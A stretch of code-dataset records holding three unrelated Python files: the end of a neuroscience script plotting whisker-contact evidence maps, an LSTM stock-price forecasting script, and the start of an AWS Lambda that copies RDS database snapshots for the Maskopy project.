f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_CHOICEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'choice_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -.5\n evidence_vmax = .5\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n \n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n \n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n\n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n \n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300) \n\n \nplt.show()", "repo_name": "cxrodgers/Rodgers2021", "sub_path": "04_logreg_vis/main3b.py", "file_name": "main3b.py", "file_ext": "py", "file_size_in_byte": 23786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "my.plot.plot.manuscript_defaults", "line_number": 37, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 37, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 37, "usage_type": "name"}, {"api_name": "my.plot.plot.font_embed", "line_number": 38, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 38, "usage_type": "name"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "my.plot.dataload.load_session_metadata", "line_number": 47, "usage_type": "call"}, {"api_name": "my.plot.dataload", "line_number": 47, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 51, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 51, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "my.plot.misc.transform", "line_number": 89, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 89, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 89, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 99, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 99, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.isinf", "line_number": 192, "usage_type": "call"}, {"api_name": "my.plot.misc.transform", "line_number": 206, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 206, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 206, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_product", "line_number": 274, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.Index", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 366, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 367, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "extras.plot_warped_edge_summary", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "extras.combine_whisker_occupancy_to_rgb", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 497, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm.gray_r", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 498, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "my.plot.plot.alpha_blend_with_mask", "line_number": 502, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 502, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 502, "usage_type": "name"}, {"api_name": "my.plot.plot.imshow", "line_number": 511, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 511, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 511, "usage_type": "name"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 518, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 567, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 568, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 568, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 569, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 598, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 618, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 619, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 623, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 632, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 635, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 672, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 672, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 681, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 682, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 683, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 683, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 712, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 733, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 737, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 746, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 749, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 759, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 759, "usage_type": "name"}]} +{"seq_id": "24882022462", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport DataPreProcessor\nimport sys\nimport os\nimport csv\nimport tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation\nfrom tensorflow.keras.layers import LSTM\n\npath = \"Data\"\ndirectory = os.fsencode(path)\ndirs = os.listdir(path)\n\nMatcher=pd.read_csv(\"Symbol_Piotroski1.csv\")\n\nTicker=list(Matcher['SYMBOL'])\n\nresult = []\n\nfor file in dirs:\n if file.split('.')[0] in Ticker:\n\n np.random.seed(7)\n\n current_file = \"Data/\" + str(file)\n dataset = pd.read_csv(current_file, usecols=[1,2,3,4])\n dataset = dataset.reindex(index = dataset.index[::-1])\n\n obsolete = np.arange(1, len(dataset) +1, 1)\n\n OHLC_avg = dataset.mean(axis=1)\n OHLC_avg_copy = dataset.mean(axis=1)\n HLC_avg = dataset[['High', 'Low', 'Close']].mean(axis=1)\n close_val = dataset[['Close']]\n\n plt.plot(obsolete, OHLC_avg, 'r', label='OHLC_avg')\n plt.plot(obsolete, HLC_avg, 'b', label='HLC_avg')\n plt.plot(obsolete, close_val, 'g', label='Closing Price')\n plt.legend(loc = 'upper right')\n plt.show()\n\n OHLC_avg = np.reshape(OHLC_avg.values, (len(OHLC_avg),1))\n scaler = MinMaxScaler(feature_range=(0,1))\n OHLC_avg = scaler.fit_transform(OHLC_avg)\n\n train_OHLC = int(len(OHLC_avg) * .75)\n test_OHLC = len(OHLC_avg) - train_OHLC\n train_OHLC, test_OHLC = OHLC_avg[0:train_OHLC,:], OHLC_avg[train_OHLC:len(OHLC_avg),:]\n\n trainX, trainY = DataPreProcessor.new_dataset(train_OHLC,5)\n testX, testY = DataPreProcessor.new_dataset(test_OHLC, 5)\n\n trainX = np.reshape(trainX, (trainX.shape[0], 1,trainX.shape[1]))\n testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n step_size = 5\n\n model = Sequential()\n model.add(LSTM(32, input_shape=(1, step_size), return_sequences=True))\n model.add(LSTM(16))\n model.add(Dense(1))\n model.add(Activation('linear'))\n\n model.compile(loss='mean_squared_error', optimizer='adagrad')\n model.fit(trainX,trainY,epochs=50, batch_size=15, verbose=2)\n\n trainPredict = model.predict(trainX)\n testPredict = model.predict(testX)\n\n # DE-NORMALIZING FOR PLOTTING\n\n trainPredict = scaler.inverse_transform(trainPredict)\n trainY = scaler.inverse_transform([trainY])\n testPredict = scaler.inverse_transform(testPredict)\n testY = scaler.inverse_transform([testY])\n\n # TRAINING RMSE\n trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:, 0]))\n print('Train RMSE: %.2f' % (trainScore))\n\n # TEST RMSE\n testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:, 0]))\n print('Test RMSE: %.2f' % (testScore))\n\n # CREATING SIMILAR DATASET TO PLOT TRAINING PREDICTIONS\n trainPredictPlot = np.empty_like(OHLC_avg)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[step_size:len(trainPredict) + step_size, :] = trainPredict\n\n # CREATING SIMILAR DATASSET TO PLOT TEST PREDICTIONS\n testPredictPlot = np.empty_like(OHLC_avg)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(trainPredict) + (step_size * 2) + 1:len(OHLC_avg) - 1, :] = testPredict\n\n # DE-NORMALIZING MAIN DATASET\n OHLC_avg = scaler.inverse_transform(OHLC_avg)\n\n # PLOT OF MAIN OHLC VALUES, TRAIN PREDICTIONS AND TEST PREDICTIONS\n plt.plot(OHLC_avg, 'g', label='original dataset')\n plt.plot(trainPredictPlot, 'r', label='training set')\n plt.plot(testPredictPlot, 'b', label='predicted stock price/test set')\n plt.legend(loc='upper right')\n plt.xlabel('Time in Days')\n plt.ylabel('OHLC Value of Apple Stocks')\n plt.show()\n\n # PREDICT FUTURE VALUES\n last_val = OHLC_avg[np.array([-1, -2, -3, -4, -5])]\n last_val = scaler.fit_transform(last_val)\n # last_val_scaled = last_val/last_val\n # next_val = model.predict(np.reshape(last_val, (1,1,step_size)))\n # print (\"Last Day Value:\", np.asscalar(last_val))\n # print (\"Next Day Value:\", np.asscalar(last_val*next_val))\n\n pred_vals = []\n pred_vals1 = []\n pred_vals1.append(file)\n for i in range(0, 5):\n # last_val_scaled = last_val/last_val\n print(last_val)\n next_val = model.predict(np.reshape(last_val, (1, 1, step_size)))\n pred_vals.append(next_val)\n print(next_val)\n last_val = np.append(last_val, next_val)\n last_val = np.delete(last_val, 0)\n\n # next_vals.append(np.asscalar(model.predict(np.reshape(, (1,1,step_size)))))\n # last_val1.append(next_vals[i-1]*last_val1[i])\n # pred_vals=scaler.inverse_transform(np.array(pred_vals).reshape(1,5))\n\n ### Scaling Values back using last 5 values as scale standard\n pred_vals = np.array(pred_vals).reshape(1, 5)\n last_val_unscaled = np.array(OHLC_avg_copy[np.array([0, 1, 2, 3, 4])]).reshape(1, 5)\n\n scaler = MinMaxScaler(feature_range=(0, 1))\n last_val_scaler = scaler.fit_transform(last_val_unscaled)\n\n pred_vals_rescaled = scaler.inverse_transform(pred_vals)\n\n a = list(pred_vals_rescaled)[0]\n pred_vals1.append(a)\n\n result.append(pred_vals1)\n\n res = pd.DataFrame(result)\n res.to_csv('results.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "Nandish0409/MiniProject", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.fsencode", "line_number": 17, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "22353516718", "text": "import os\nimport json\nimport re\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSTS_CLIENT = boto3.client(\"sts\")\nCUSTOM_KMS_KEY = os.environ['custom_kms_key']\nASSUME_ROLE_ARN = os.environ['assume_role_arn']\n\ndef lambda_handler(event, context):\n \"\"\"Lambda handler for the zeroth lambda of the Maskopy process.\n Args:\n event (dict): AWS Lambda uses this parameter to pass in event data to the handler.\n context (Context): AWS Lambda provides runtime info and meta data.\n Returns:\n :obj:`dict` of str:str: Return dict with details of snapshot that was created.\n Raises:\n MaskopyResourceNotFoundException: Raised if inputs are not valid.\n Exception: Generic exception raised\n if final snapshot name already exists in destination.\n \"\"\"\n\n rds_client_local = boto3.client(\"rds\")\n assume_role_session = create_account_session(\n STS_CLIENT,\n ASSUME_ROLE_ARN,\n context.aws_request_id)\n rds_client = assume_role_session.client('rds')\n\n snapshots_created = []\n application_name = event[\"ApplicationName\"]\n cost_center = event[\"CostCenter\"]\n snapshot_identifier = event['CheckInputs']['firstSnapshotIdentifier']\n engine = event['Engine']\n # Get original snapshot_tags to append to cloned snapshot\n snapshot_tags = [\n {'Key': 'ApplicationName', 'Value': 'MASKOPY'},\n {'Key': 'Cost Center', 'Value': cost_center}\n ]\n\n parameter_group = event.get('RdsParameterGroup')\n if not parameter_group:\n parameter_group = get_parameter_group(rds_client, rds_client_local, snapshot_identifier)\n # If maskopy- snapshot exists, then use already existing snapshot.\n new_snapshot_identifier = (f\"MASKOPY-{application_name}-\"\n f\"{re.sub('[^A-Za-z0-9-]+', '', snapshot_identifier)}-\"\n f\"{context.aws_request_id}\")\n new_snapshot = copy_db_snapshot(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine['Type'],\n snapshot_tags, CUSTOM_KMS_KEY)\n if 'aurora' in engine['Type']:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBClusterSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBClusterSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBClusterIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine':engine['Type'],\n 'EngineVersion':engine['Version']\n })\n else:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBInstanceIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine': engine['Type'],\n 'EngineVersion':engine['Version']\n })\n\n return snapshots_created\n\ndef check_snapshot_exists(rds_client, snapshot_identifier, engine):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n if \"aurora\" in engine:\n return check_snapshot_exists_cluster(rds_client, snapshot_identifier)\n else:\n return check_snapshot_exists_instance(rds_client, snapshot_identifier)\ndef check_snapshot_exists_cluster(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_cluster_snapshots(\n DBClusterSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB cluster snapshot: {err}')\n #raise\n return False #CHECK IF VALID OUTPUT\ndef check_snapshot_exists_instance(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_snapshots(\n DBSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB snapshot: {err}')\n raise\ndef copy_db_snapshot(rds_client, snapshot_identifier,\n new_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n if 'aurora' in engine:\n return copy_db_snapshot_cluster(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\n else:\n return copy_db_snapshot_instance(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\ndef copy_db_snapshot_cluster(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_cluster_snapshot_parameters = {\n 'SourceDBClusterSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBClusterSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_cluster_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_cluster_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,\n engine)\n if not destination_snapshot_response:\n 